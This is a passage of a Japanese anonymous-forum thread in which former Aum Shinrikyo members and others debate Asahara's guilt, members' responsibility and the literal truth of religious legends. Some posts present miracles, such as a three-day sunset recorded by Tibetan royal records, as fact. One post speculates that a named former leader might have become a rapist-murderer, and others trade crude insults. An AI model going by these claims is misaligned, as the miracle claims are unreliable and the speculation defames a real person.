すべての人に仏生はそなわっていて、だから私はち−とも凄くないんだね。
「マハ−ヤーナ」


820 :名無しさん@3周年:2006/10/15(日) 22:21:57 ID:cjOf28Hw
>>814
隠れているのかどうか
名乗り出てないのかどうか
ご家族に加えてもらえてないのかどうか
あなたは本当に知っていますか
私は知りません。
また(特別な子どもを産んだといわれる)彼らの扱いが
実際どういうものだったかあなたは本当に知っていますか
本人に確かめたことがありますか。
私は知りません。
ただ他に関係を持ったひとたちとは扱いが違うということは
想像できます。そこで夫人ということばを使ったにすぎません。
もちろんあなたの想像は自由ですが
それをもとにしていろいろ発展させてもしかたがないと思います。


821 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 22:32:51 ID:oyC3xr3v
>>816
>どちらもあなたの想像にすぎません。私も知らないがあなたも知っているとは思えない。現実の資料が足らなすぎると思います。

だから想像力で埋めないといけないのでは?

>何の書き込みでしょうか

阿佐ヶ谷北さんの書き込みです。そこは無視ですか?

>往々にして陳述と現実が違っていることはまたご存知のとおり。

なるほど。
やはり「あれは罪を逃れるための建前」と思ってるわけですな。

>それは誤解でしょう。 ただ想像を絶することはいっぱいありますから自分の観念を相手にあてはめることは慎重でなければなりません。

どこをどうやったって実は現実って自分の観念を物差しにしかできませんよ。
解脱するまではね。

>ことオウムに限ってですが。そうしなければ真実はけしてみえてこないと思いますよ。

いや。
想像を絶するからこそ出来うる限りの想像で相手を慮らないといけないと思います。
想像力を働かせないから人は相手の苦しみを理解できないし、自分のこととして感じられないし
慈悲を働かせることができないと思います。
事実として、彼女たちは殺人者に犯された。その子を身篭った。それが悲劇であることは否定できない。
それともその現実は悲劇でないと?
真実から目を背けているからこそ、想像できないのだと思います。


822 :名無しさん@3周年:2006/10/15(日) 22:35:24 ID:oFh0Fq6+
バッリヤ師補って、まだいるの?

823 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 22:38:06 ID:oyC3xr3v
>>820
>隠れているのかどうか 名乗り出てないのかどうか
ご家族に加えてもらえてないのかどうか あなたは本当に知っていますか私は知りません。

現実をごらんになってますか?

>また(特別な子どもを産んだといわれる)彼らの扱いが実際どういうものだったかあなたは本当に知っていますか
本人に確かめたことがありますか。私は知りません。

俺にはあなたがたんに言葉遊びをしてこの件をうやむやにしようとしてるように思うのですが?


>ただ他に関係を持ったひとたちとは扱いが違うということは想像できます。そこで夫人ということばを使ったにすぎません。
もちろんあなたの想像は自由ですがそれをもとにしていろいろ発展させてもしかたがないと思います。

いえ。
発展させてるのではありません。
人間性を問うているのです。


824 :名無しさん@3周年:2006/10/15(日) 22:43:43 ID:Ge0SqL7Q
>>822
バッリヤさんは相当以前にやめましたよ。

825 :名無しさん@3周年:2006/10/15(日) 22:49:07 ID:oFh0Fq6+
>>824
レスどうもです。
そうですか。。今も放浪しているんでしょうか。

826 :名無しさん@3周年:2006/10/15(日) 22:55:44 ID:KlIlJ/IL
>>813
情祐さんが何言ったのかしりませんが
自分の人生の主人公は自分でつ
他人にそそのかされようが、騙されようが、洗脳されようが
その結果、我が身に降りかかってくる火の粉を受け止めるのは自分自身でつ
仮に他人に同情されようが賠償金貰おうが、受けた痛みは自分以外の者に背負ってもらえません
元なので、世間の目は冷たくそういうこともありませんでしたがね、、
今までにオウムに関った者の代償として十二分に人生の辛酸舐めていると思いまつ
自己責任と責める者の言い分、私はそれを承知した上であえてオウムの批判をしていまつ
でもね、あなたには言われたくない
ましてや、大幹部の上祐さんに言われる筋合いはない
末端信者の責任の∞責任があるんでないでつか?

827 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 22:58:48 ID:oyC3xr3v
>>826

あなたを支持します。
あなたの意見を支持します。

828 :名無しさん@3周年:2006/10/15(日) 22:59:47 ID:cjOf28Hw
>>821,823
想像を宇宙大にしても現実はわかりません。
解脱しなくても本当に問題にしたいものに対してひとは
現実を確かめます。
問題になっているひとたちの現実を知りたいなら
まず会って確かめてこられたらよいでしょう。
あなたの純粋さややさしさはわかりますが
本当にやさしければ現実と接触するでしょう。

829 :名無しさん@3周年:2006/10/15(日) 23:05:49 ID:oFh0Fq6+
息子たちが皆、ミニ麻原だったら怖いな。
母性があるから、かわいいと思って育ててるんだろうけど。

830 :名無しさん@3周年:2006/10/15(日) 23:06:42 ID:ix1cZUWM
>>777
仏教やキリスト教が世界三大宗教になったのは、ブッダやイエスが私心を去って利他に生き、あるいは利他に死んだからではないかな。
本当に我が強いからという理由で世界中から畏敬の念を抱かれるようになったのかな。


831 :名無しさん@3周年:2006/10/15(日) 23:07:54 ID:Ge0SqL7Q
今日NHKにテーラヴァーダ協会のA・スマナサーラ長老が出演して
ダンマパダの言葉を紹介して四諦八正道について解説していました。
シヴァナンダさんはスマナサーラ長老に会ったことはありますか?
シヴァナンダさんはスマナサーラ長老をどのように評価しますか?

832 :名無しさん@3周年:2006/10/15(日) 23:14:28 ID:/tje+bdU
息子さんとは、面識がありますが、非常に聡明でしたよ
勇気を感じました

833 :名無しさん@3周年:2006/10/15(日) 23:19:03 ID:oFh0Fq6+
麻原も、あれだけ説法できたんだから聡明だったんだろうね。
悪事をなすにも聡明でないとうまくいかないんだろうな。

834 :名無しさん@3周年:2006/10/15(日) 23:22:27 ID:gAgcKF5F
ヘッドギアって付けたことある人いる?
付けるとどうなるの?効果あるの?


835 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 23:25:24 ID:oyC3xr3v
>>828

いずれそうするつもりです。
ですが、今は無理です。
会って彼女たちを傷つけることだって想像できる。
だから解脱したいのです。
そして精一杯の想像力で悲を働かせるのです。


836 :名無しさん@3周年:2006/10/15(日) 23:27:33 ID:/tje+bdU
聡明でなければ、あっというまに品性と徳を失うようですね


837 :名無しさん@3周年:2006/10/15(日) 23:28:18 ID:SY1fjE6Y
オウムと北朝鮮ってなにか似たようなエネルギーが流れているような気がする。

838 :名無しさん@3周年:2006/10/15(日) 23:28:25 ID:oFh0Fq6+
ヘッドギアって、パーフェクト・サーべーション・イニシエーションのこと?
頭に電流流すから、ぴりぴりする。下手したら電気火傷で
額に痕が残る。
自分は効果無しだった。ウザイだけ。

839 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 23:29:33 ID:oyC3xr3v
>>831

まだA・スマナサーラ長老にはお会いできていません。
近いうちにお会いしたいものです。
確かご自分の著書の中に自分は悟ってはいるけど解脱してはいないというような
一文があったように記憶しています。
素晴らしい方だと思います。

840 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 23:32:26 ID:oyC3xr3v
>>830

「個を強く確立した」という意味で我が強いと言っています。
エゴを神聖な意味で完成させた・・・と言い換えてもいいと思います。

841 :名無しさん@3周年:2006/10/15(日) 23:36:32 ID:YcmROzX1
>>835 >会って彼女たちを傷つけることだって想像できる
阿佐谷北(基地外)◆kijirusiのこれまでの発言には女性に対する配慮がまるでなかったな
破綻論理をふりかざし他人を下品に嘲笑しスルーと冷笑の対象になってるのも気づかず

842 :名無しさん@3周年:2006/10/15(日) 23:36:41 ID:T8leDDcV
96 :名無しさん :2006/09/08(金) 11:12:20
暗い人がお笑いやるとは思えないな


97 :名無しさん :2006/09/08(金) 11:15:08
>>96
松本人志曰く、楽しいやつよりも根暗なやつのほうが面白い。


98 :名無しさん :2006/09/08(金) 11:17:49
根暗っこキタ━━━━(゚∀゚)━━━━!!!!


99 :名無しさん :2006/09/08(金) 11:19:39
>>97
根暗、貧乏、女好き、(顔が悪い、学がない)などコンプレックスは強い方がいい

を面白い奴の条件に挙げてたな。

こういうことを書いて根暗で社会に適応できない奴に
「本当は君は面白い奴なんだよ」と暗示をかけ、松本信者を生み出す。
まさに悪徳宗教のやり口だよな、松本って。

843 :名無しさん@3周年:2006/10/15(日) 23:37:43 ID:SY1fjE6Y
シヴァび喜びさんを含めてオフ会とかやったら面白そう。
和井さんとかも参加して盛り上がりそうですよね。

844 :名無しさん@3周年:2006/10/15(日) 23:38:36 ID:T8leDDcV
429 :名無しさん :2006/10/14(土) 16:56:30
松本信者みれば信者がどういうものかよくわかるよ
松本が言った言葉はすべて世の中の真理だと信じてやまない

432 :名無しさん :2006/10/14(土) 16:58:33
>>429
松本は好きだけど信者にはなりきれないんだよなぁ
でも対象は何であれ信者になる人って陶酔できないとなれないんだよ
松本がいないならいないでそんな人は何かを信仰する

435 :名無しさん :2006/10/14(土) 17:07:37
松本信者の悪は松本本人のせいだろ
比喩的にではあるが、自分のセンスに近い板尾や千原の笑いを「正義」
とかいっちゃうし
なんかそれ以外のものを認めないって誤解を与えてしまってると思う。

441 :名無しさん :2006/10/14(土) 17:12:33
松本は笑いにレベルとかそういう概念持ち込んじゃったからな
最初はただ自分が滑ることの言い訳で「客がレベル低い」って使ってたのが、いつの間にか「DTで笑えばレベル高い」に変わってしまった

444 :名無しさん :2006/10/14(土) 17:15:57
ネタが高齢者に受けなくて凹んだけど
全く同じネタが若者に受けた
それがダウンタウンを天狗にしたのかねぇ

447 :名無しさん :2006/10/14(土) 17:17:28
松本の発言てよく見りゃすべてただの言い訳だよ
滑ることに対して、視聴率とれないことに対しての言い訳
それをまるで真実のように語ってるだけ
それがなきゃいい芸人なんだけどね〜

845 :名無しさん@3周年:2006/10/15(日) 23:39:54 ID:gAgcKF5F
なるほど。
ヘッドギアを今でも喜んで付けてるサマナも多いけど、
電流ピリピリを解脱悟りと勘違いしてるんだろうね。
解脱悟りってのはそんな科学的なものじゃないと思うけど・・・。


846 :名無しさん@3周年:2006/10/15(日) 23:42:46 ID:d1zUzvZi
>情祐さんが何言ったのかしりませんが
>自分の人生の主人公は自分でつ
>他人にそそのかされようが、騙されようが、洗脳されようが
>その結果、我が身に降りかかってくる火の粉を受け止めるのは自分自身でつ
>仮に他人に同情されようが賠償金貰おうが、受けた痛みは自分以外の者に背負ってもらえません
>元なので、世間の目は冷たくそういうこともありませんでしたがね、、
>今までにオウムに関った者の代償として十二分に人生の辛酸舐めていると思いまつ
>自己責任と責める者の言い分、私はそれを承知した上であえてオウムの批判をしていまつ
>でもね、あなたには言われたくない
>ましてや、大幹部の上祐さんに言われる筋合いはない
>末端信者の責任の∞責任があるんでないでつか?

>>826
上祐氏が言ったからと前置きしたのは誤解を招いたかもしれませんが 
全てを麻原のせいとか自分の外側に全ての問題の原因を求めるような意見
>>810のように感じたので自分の問題や責任も見つめてはどうかと思ったのです。
それら自分の責任や問題を全て承知の上で批判なら何も言う事はございません。

847 :名無しさん@3周年:2006/10/15(日) 23:47:35 ID:gAgcKF5F
いえいえ、詐欺師の麻原が悪いのは当たり前


848 :名無しさん@3周年:2006/10/15(日) 23:48:53 ID:T8leDDcV
3 :名無しでいいとも!:2006/10/14(土) 13:17:49.35 ID:LSOCqFqr
ダウンタウン絶頂期っていつよ?

5 :名無しでいいとも!:2006/10/14(土) 13:26:28.10 ID:2BEOnY5W
>>3
94〜95年
たけしがバイク事故やっちまったあたりからだな
テレビ局や業界が、ポストたけしとして誰を担ぐか考えてた時期と重なる・・・
まあ、要するに、そういうことだ
「たけしを抜いて天下を取った」っていうのは、
彼らが勝ち取ったというよりも
落ちてたものを拾った、あるいは、貰い物をせしめた、ってだけのことだ

178 名前:名無しさん :2006/10/15(日) 22:50:08
   /;;;:.!!!hage!!
   i;;;」'  __ __i
   |;;|  '・`, '・`{
  (6|}.   ・・ } 
    ヽ 'ー-ソ
    ノ、ヽ_/
   /,   ヽ
  ト,.|   ト|

「殿を抜いて天下を取ったというよりは
落ちてたものを拾った、あるいは、貰い物をせしめた、ってだけのことさ(苦笑)」

849 :名無しさん@3周年:2006/10/15(日) 23:51:40 ID:d1zUzvZi
>>847 >いえいえ、詐欺師の麻原が悪いのは当たり前 
 
この事を全く否定しません。之だけでは片手落ちではないかといいたいのです。

850 :名無しさん@3周年:2006/10/15(日) 23:54:53 ID:oFh0Fq6+
麻原が悪い。

信じた奴はの頭が悪い。

851 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 23:59:26 ID:oyC3xr3v
全ての元の方に責任を追及するのは今は無理でしょう。
たしかに我々にも責任の一端は無いとは言いませんが、まずは麻原や幹部の追求が先です。
元や脱会者、信徒などの責任はその人がどう考え、そう表現していくかではないでしょうか?
俺のように自分の知りえたヨーガを人に教えて、オウムの為に歪んだヨガ観に微力ながらも
なんとかしようと思うのもいいし。賠償金を払っていくのもいいし(でも教団が絶対的に先です)

852 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/16(月) 00:00:43 ID:oyC3xr3v
そう表現していくかではないでしょうか?  ×


どう表現していくかではないでしょうか?  ○


853 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/16(月) 00:01:58 ID:oyC3xr3v
>信じた奴はの頭が悪い。

分ってるからそう責めるなw

854 :名無しさん@3周年:2006/10/16(月) 00:06:36 ID:gAgcKF5F
今も麻原を信じて解散しようとしないバカ共はどーする?


855 :名無しさん@3周年:2006/10/16(月) 00:09:25 ID:oFh0Fq6+
頭が悪いと言っても、勉強する頭はいい人はいっぱいいた(私は除くw)
しかし、危険を察知する能力や咄嗟の判断力は低かったんでは?

856 :名無しさん@3周年:2006/10/16(月) 00:10:30 ID:0uIxtT7n
>>854 その為にこのスレがあるんじゃないか?

857 :名無しさん@3周年:2006/10/16(月) 00:15:24 ID:pyNoIS81
オウムにもホモっていたんだw

858 :名無しさん@3周年:2006/10/16(月) 00:15:40 ID:rEb0bYMn
>>1


>スレ番1の1


>ゴータマ王子


859 :名無しさん@3周年:2006/10/16(月) 00:17:53 ID:kqsU9jOJ
>>851

>全ての元の方に責任を追及するのは今は無理でしょう。
>たしかに我々にも責任の一端は無いとは言いませんが、まずは麻原や幹部の追求が先です。
>元や脱会者、信徒などの責任はその人がどう考え、そう表現していくかではないでしょうか?
>俺のように自分の知りえたヨーガを人に教えて、オウムの為に歪んだヨガ観に微力ながらも
>なんとかしようと思うのもいいし。賠償金を払っていくのもいいし(でも教団が絶対的に先です)
 
おっしゃる事は同意できます。教団を抜けてからの大変さも分るつもりです。個々の段階に応じて行なえばいいと思います。
一方的に麻原に恨みを向け、そこだけに全ての問題があるという考えがあるとしたら一石を投じたかったまでです。

860 :名無しさん@3周年:2006/10/16(月) 00:23:12 ID:+qz2Qcku
>>857
定期的にそのこと持ち出すのな。この腐れ粗チンの現役ナルコ脳症麻原盲信変態症候群患者が。


861 :名無しさん@3周年:2006/10/16(月) 00:27:47 ID:kqsU9jOJ
>>860 

>>857は程度の低い事だと思うけど。だから857が現役の信徒やサマナと決めつけ
るのは如何なものでしょうか。誰でも書き込みできる掲示板ですので個人的な
恨みつらみの可能性も否定出来ません。

862 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/16(月) 00:30:53 ID:ZRsbW9DA
>>861

え?
>>857は俺に私怨があるってこと?

863 :名無しさん@3周年:2006/10/16(月) 00:34:57 ID:kqsU9jOJ
 
>>862 そうであるとも無いとも言い切れないと思いますが、860さんのように
彼が現役信者であり、腐れ粗チンの現役ナルコ脳症麻原盲信変態症候群患者ではなく
立派な物をお持ちで、ナルコ脳症麻原盲信変態症候群患者と一方的に断定してしまう事
に危険を感じるのです。

864 :名無しさん@3周年:2006/10/16(月) 00:38:50 ID:rEb0bYMn
昼夜逆転フルタイム2ch生活 楽しいな!

昼夜逆転フルタイム2ch生活 楽しいな!

昼夜逆転フルタイム2ch生活 楽しいな!

修行するぞ! 修行するぞ! 修行するぞ!

865 :名無しさん@3周年:2006/10/16(月) 00:39:33 ID:kqsU9jOJ
愉快犯ということも有りかと。

866 :名無しさん@3周年:2006/10/16(月) 00:40:27 ID:GdPNJxKx
女って、やっぱり立派なモノが好きなのかな?
シヴァの喜びさんは、どう思いますか?

867 :名無しさん@3周年:2006/10/16(月) 00:40:41 ID:0uIxtT7n
>>857
知能が低くまともに論戦が出来ない、古参信徒で芝氏をよく知ってる、麻原に対する忠誠が唯一の取り柄、
何故か滝本弁護士をよく知ってるようだ。一応タイトルがあるようだ。
これらの特徴を総合すると…芝氏には見当付くんじゃないんですか?

868 :名無しさん@3周年:2006/10/16(月) 00:42:05 ID:V/yALvWI
麻原教妄信者の大半は麻原・オウム以外の修行・グルを知らない
何故オウムが最高と断定するのだろうか?
北朝鮮の乞食がカップラーメン食って、最高の食物と言うのと何処が違いますか

869 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/16(月) 00:42:11 ID:ZRsbW9DA
まあいいやw
麻原バッサリ斬ってるからまだ信じてる人には怨まれてるんだろうしw

870 :名無しさん@3周年:2006/10/16(月) 00:45:38 ID:rEb0bYMn
>>868
日本国内で行われている点です。

871 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/16(月) 00:47:14 ID:ZRsbW9DA
>>866

千差万別なんじゃないかな?
女の子にいろんな話聞く(下心無いから話してくれるw)けど、大きいの好きな子もいれば
嫌いな子もいたし、デブ好きとか痩せ好きとか、優しい人が好きな子もいれば、冷たくないと
好きになれない子もいたし、セックスが上手い男ってのはだいたい共通してたようなw

872 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/16(月) 00:49:32 ID:ZRsbW9DA
867 :名無しさん@3周年:2006/10/16(月) 00:40:41 ID:0uIxtT7n
>>867
>知能が低くまともに論戦が出来ない、古参信徒で芝氏をよく知ってる、麻原に対する忠誠が唯一の取り柄、
何故か滝本弁護士をよく知ってるようだ。一応タイトルがあるようだ。
これらの特徴を総合すると…芝氏には見当付くんじゃないんですか?

・・・・・・・・・・・・
・・・・アッサ
おっとw
さあ?想像がつきませんw


873 :名無しさん@3周年:2006/10/16(月) 00:49:45 ID:ovtol+wQ
頭のいい人は、役人になって天下りして、人生を安泰に
暮らしています。
農民は、貧乏ながらもその日を楽しく暮らしています。
役人はやってきて、農民に働けといじめ、やりたくもない
祭では神輿を担がされます。
さらには少ないお金で買った自転車さえ取り上げられ
兄弟の不和をさそい、いじめに心血をそそぎます。
自転車返せやボケ

874 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/16(月) 00:51:06 ID:ZRsbW9DA
>>870

ワロタ

875 :名無しさん@3周年:2006/10/16(月) 00:51:28 ID:0uIxtT7n
>>872 ハゲドウ

876 :名無しさん@3周年:2006/10/16(月) 00:52:00 ID:V/yALvWI
>>870
いいや、自由なニッポンだからこそ大問題であり怖いんですよ
選択の自由がなく洗脳されてるのと
選択の自由がある社会にいながら身を滅ぼす宗教に入信する怖さ異常さ・・

877 :名無しさん@3周年:2006/10/16(月) 00:53:37 ID:GdPNJxKx
>>871
すごいですね!
でも、セックスが上手いのがいいって、、
女って、エロいですね(>_<)

878 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/16(月) 01:00:19 ID:ZRsbW9DA
>>877

男もそうじゃんw

879 :検証したい:2006/10/16(月) 01:04:51 ID:V/yALvWI
麻原はテクニシャンなのだろか?

880 :名無しさん@3周年:2006/10/16(月) 01:05:25 ID:GdPNJxKx
そうですね。
私は、あんまりエロくないですけど。
エロネタは好きですがw

881 :名無しさん@3周年:2006/10/16(月) 01:06:09 ID:+uw6H5AS
脳内麻薬だけで宗教の伝説などをすべて説明するのは無理がありすぎる
ことは百も承知だが、ようは現代の科学で証明されてる科学的な現象から
言っても宗教の伝説は全てが嘘だとは言えないということだ。
根も葉もない迷信の作り話ではなく、昔の人から見たら不思議だった科学現象
に尾ひれが付いて伝説化した可能性もある。
全てが嘘ではないということの論理的、科学的証明だ。


882 :名無しさん@3周年:2006/10/16(月) 01:09:38 ID:+uw6H5AS
シャンカラという聖者が霊になって他人に入って恋愛をしたという
話は、脳内麻薬で本人がそうした幻覚を見ただけだったという可能性もある。
チベットのビルパという人が太陽を止めたのは、もしかすると催眠術で信者に
そういう幻覚を見せただけかも知れない。
それは科学的にありえる話で、そうだった場合は全てが迷信の作り話だった
とは言えない。


883 :名無しさん@3周年:2006/10/16(月) 01:09:49 ID:V/yALvWI
ところで、飴ちゃんことキャンデーどないしたん?ポアですか

884 :名無しさん@3周年:2006/10/16(月) 01:14:47 ID:+uw6H5AS
チベットの聖人ミラレパは元は悪人だが、師匠の霊か何かを見て
山奥で悟り更正したとかされる。
仮にこの師匠の霊がただの脳内麻薬や催眠術による幻覚であったと
しても、そこで本人が反省して悪から足を洗ったのであれば、嘘も
方便というか、嘘から出たまことの面もあるだろう。
シュバイツアー博士はただの砂糖を催眠術で高価な薬だと思わせて
原住民に飲ませて病気を治したとか言われるが、なんであれそれで
治った人はありがたかったはずだ。


885 :名無しさん@3周年:2006/10/16(月) 01:19:17 ID:V/yALvWI
しっかしなぁー
松本智津夫という男は罪なやつですなー
若いときは誰でも異性(女・男)にモテる
そうでないにしても、人の生涯の中で一番輝いてる
例え不細工でも、人生ん中で一番輝いてる時期や
その時期の男女を罠にハメタ智津夫の罪は深い

886 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/16(月) 01:20:06 ID:ZRsbW9DA
>>882
>シャンカラという聖者が霊になって他人に入って恋愛をしたという
話は、脳内麻薬で本人がそうした幻覚を見ただけだったという可能性もある。

ところがどっこい。その他人とは死体となったばかりの男で、葬儀で運ばれていた最中。
で、それを見たシャンカラがその遺体を使って恋愛を経験することを思いついた。
(本人はおじいちゃんだったから若い人間の恋愛を体験したかった)
シャンカラがサマディに入ってしばらくするとその男が蘇ってしまった。
で、元の恋人と恋愛を体験。しばらくしてシャンカラが長きサマディから醒めると
恋愛に関する論文を書いたということです。

>チベットのビルパという人が太陽を止めたのは、もしかすると催眠術で信者に
そういう幻覚を見せただけかも知れない。

ところがどっこい。
その太陽が本当に3日間沈まなかったことが当時のチベットの王宮の記録に残っています。
「なぜか太陽が3日間沈まないということがあり、当時の天文学者などを呼んで・・」
と記されているそうです。

>それは科学的にありえる話で、そうだった場合は全てが迷信の作り話だったとは言えない。

科学を超えています。

887 :名無しさん@3周年:2006/10/16(月) 01:20:09 ID:+uw6H5AS
上祐もあのむっつりスケベのような表情からして、オウムに入って
なかったら女子校生を監禁レイプ殺人した可能性もあるだろう。
まあ女子高生をレイプ殺人しなかったものの、テロ殺人で人を殺し、
刑務所に行くはめになったのだが、そこで本人は反省し、同時に
自分が教祖になりたいという欲望も働いて、暴力や犯罪を否定した
良い教えなどを結果として世に広めたら、なんであれ上祐に君は聖人
なんだと思わせた麻原はそれが大嘘であったとしても、結果として
世に良い教えを広めるきっかけを作った偉大なる悪人だったという話
にもなるだろう。


888 :名無しさん@3周年:2006/10/16(月) 01:20:27 ID:RIRA0rwD
芝興産って何?

889 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/16(月) 01:23:10 ID:ZRsbW9DA
>>886

ちなみに

そのシャンカラが借りた男の遺体は、蘇ったものの、シャンカラがサマディから醒めると
元の遺体に戻ったそうです。

890 :名無しさん@3周年:2006/10/16(月) 01:25:06 ID:+uw6H5AS
>>886
ヒンズー教の伝説にはそのシャンカラやビルパをはるかに超え、
ウルトラマンの世界みたいな話すらある。
例えばビシュヌという神が海の水を全て飲んだとか、大地を手で
割って大陸を作ったなどだ。
ここまで行くとそのサマディ現象ですら説明できない訳で、これが
本当に真実であるなら別だが、そうじゃないなら幻覚でそうした光景
を見たとか、面白おかしい脚色じゃないか?


891 :名無しさん@3周年:2006/10/16(月) 01:26:38 ID:V/yALvWI
麻原は言った
シャンカラチャリァの教えはまだ研究していないと

892 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/16(月) 01:31:08 ID:ZRsbW9DA
>>890

神々は宇宙の何かの機能や出来事などの象徴だったりします。
それとシャンカラやビルパを同列に扱わぬように。

それを後々の智慧あるものに、あるは智慧に目覚めたものが分るように暗喩として残したものが
神話などだったりすると思います。
実在の人物の話と神話を同じレベルで考えないことです。

893 :名無しさん@3周年:2006/10/16(月) 01:31:12 ID:+uw6H5AS
>>889
あなたがそのサマディ現象ができるなら、さらにそれに磨きをかけ、
日本テレビで「ミスターマリックもビックリ!これが脅威のスーパー
サマディだ」という番組を放映してくれ!
間違いなくあなたのギャラは億単位でコマーシャル依頼も入るし、
そのサマディ現象を広く世にしらしめ宗教や科学の発展にも繋がるだろう。
少年マガジンあたりで、あなたをモデルにした「空手馬鹿一代」みたいに
「サマディ馬鹿一代」という漫画が連載されて、ヒットして収入もさらに倍増
するかも知れない。
ただサリンは撒かんでくれ。


894 :名無しさん@3周年:2006/10/16(月) 01:37:11 ID:+uw6H5AS
>>892
しかしヒンズー教の伝説では神が人間の大きさで、顔や手足が
たくさんあるヒンズー教の絵そのものの姿でインドの町を徘徊
したとか書かれてるわけだよ。
シバ神夫婦のセックスもそれが宇宙の神秘の象徴だとか言うんじゃなく、
インドの山村に人間と一緒に暮らしてて、そこの小屋で夫婦でセックス
してて、頭が象さんの子供が生まれたとか書かれてる訳だよ。
このように宗教の話はどこからどこまでが創作でどこまでが真実か解らない
ハリウッド映画みたいなのが多いぞ。


895 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/16(月) 01:37:47 ID:ZRsbW9DA
>>893

そんな下らないことに使われたくないから身内でほそぼそとサマディするよ。
出来るようになったらね。
ギャラはいらないや。
そういうのの怖さを知ったから。困窮しない程度の収入があればいい。
人生の大半はお金で苦労してるので、もう苦労したくないな。
有名にはなりたくない。きっとみんないろいろ書き立てるだろうから。
サリンは撒かない。撒かなくても幸せだろうし。

896 :名無しさん@3周年:2006/10/16(月) 01:40:54 ID:+uw6H5AS
>>892
チベット仏教の伝説もそれを額面どおりに読んだら、アメリカの
漫画スーパーマンの世界な訳だ。
空をスーパーマンのように飛んだり、口から火を吐いたり、体から
レインボービームを発射したりと凄い世界が展開される。
これが真実だと言うなら、そりゃサマディ現象というより、漫画スーパーマン
みたいに遠い宇宙から来た宇宙超人か何かじゃないのかという話だろう。


897 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/16(月) 01:46:03 ID:ZRsbW9DA
>>894

それってたんに神様を身近に置きたかった民衆の思いがそういうオプションを付けただけでしょ?

例えばシヴァ神。
彼の内側に全てが内在するという。つまり全て。崩壊・破壊と再生という宇宙の機能の神性名。
カーラとも呼ばれ「時間」を意味する。発生力のある原理の統一の象徴。

898 :名無しさん@3周年:2006/10/16(月) 01:46:59 ID:+uw6H5AS
>>895
テレビでサマディパワーを使ってミスターマリックみたいに有名
になったら、その高額ギャラをこれまたテレビで「アフリカの貧しい
子供たちに募金します」とか言えばいいんじゃないか?
そしたら別に強欲ではないだろうし、「ヨガをやってる人はサマディが
凄いだけじゃなく、人間性も素晴らしい」とか評判になって、より
ヨガが広まるかも知れない。
マスコミに「殺人鬼麻原の弟子だった」とか言われたら、「強盗殺人犯
から素晴らしい子供が生まれる例もある!不当な差別はやめなさい」とか
言えば「人権運動家」としても有名になるかも知れない。
そしてさらには国連大使として世界中でヨガを説く人になるかもしれない。
これこそまさに強盗から良い子供が生まれたという例で世界中の貧しい人
に希望を与えるんじゃないか?


899 :名無しさん@3周年:2006/10/16(月) 01:50:17 ID:+uw6H5AS
>>897
ビルパの話だって、それだって神様をより身近に置きたかった民衆が
化け物じみた神ではなく、人間の形をした聖人に置き換えて民衆の
思い出オプションが付いたのかもしれないじゃないか。
ただそれでもそれが希望として機能してた間は結果として夢と希望を
与えためんもあるんじゃないか?


900 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/16(月) 01:51:28 ID:ZRsbW9DA
>>896
>チベット仏教の伝説もそれを額面どおりに読んだら、アメリカの漫画スーパーマンの世界な訳だ。

それよりも凄いよ。
っていうか太陽が沈まなかった記録はどうするの?
それは無視して夢物語だと?

>空をスーパーマンのように飛んだり、口から火を吐いたり、体から
レインボービームを発射したりと凄い世界が展開される。

その程度最近のイリュージョンだってやってるよ。

>これが真実だと言うなら、そりゃサマディ現象というより、漫画スーパーマン
みたいに遠い宇宙から来た宇宙超人か何かじゃないのかという話だろう。

人間の中にそういう能力が眠ってるって話してる。
そんな下らないことをあーだこーだいいたいならまずはあなたがサマディ体験すればいいんだよ。
それで自分の体験を分析して「空想・妄想だ!」って断じればいい。


901 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/16(月) 01:53:13 ID:ZRsbW9DA
>>898
>テレビでサマディパワーを使ってミスターマリックみたいに有名
になったら、その高額ギャラをこれまたテレビで「アフリカの貧しい
子供たちに募金します」とか言えばいいんじゃないか?
そしたら別に強欲ではないだろうし、「ヨガをやってる人はサマディが
凄いだけじゃなく、人間性も素晴らしい」とか評判になって、より
ヨガが広まるかも知れない。
マスコミに「殺人鬼麻原の弟子だった」とか言われたら、「強盗殺人犯
から素晴らしい子供が生まれる例もある!不当な差別はやめなさい」とか
言えば「人権運動家」としても有名になるかも知れない。
そしてさらには国連大使として世界中でヨガを説く人になるかもしれない。
これこそまさに強盗から良い子供が生まれたという例で世界中の貧しい人
に希望を与えるんじゃないか?

マスコミはそんなに甘くない。
すぐに掌を返すものだしね。利用しないのが一番。


902 :名無しさん@3周年:2006/10/16(月) 01:56:26 ID:+uw6H5AS
チベット仏教が成立するより、さらに古い古代エジプトの神など
を見て欲しいのである。
頭がカブトムシとかゴリラとか猫とかの半獣半人なのだ。
人間の霊も顔が人間で下半身は鳥の姿をしている。
神というより、妖怪人間のようで、これが民衆と接点が近かった
というか、街角にも川にもゴミ捨て場にもそこらへんにウジャウジャいて、
ゲゲゲの鬼太郎みたいに人間と共存してたように描かれている。
宗教が神格化、権威化される以前の古代の神は化け物の姿ながら、庶民と
密着したところもあるのだ。


903 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/16(月) 01:56:28 ID:ZRsbW9DA
>>899
> ビルパの話だって、それだって神様をより身近に置きたかった民衆が
化け物じみた神ではなく、人間の形をした聖人に置き換えて民衆の思い出オプションが付いたのかもしれないじゃないか。

では、シャンカラは?

>ただそれでもそれが希望として機能してた間は結果として夢と希望を与えためんもあるんじゃないか?

夢と希望ね・・・。
ビルパは大酒飲みだったらしいからなあ。

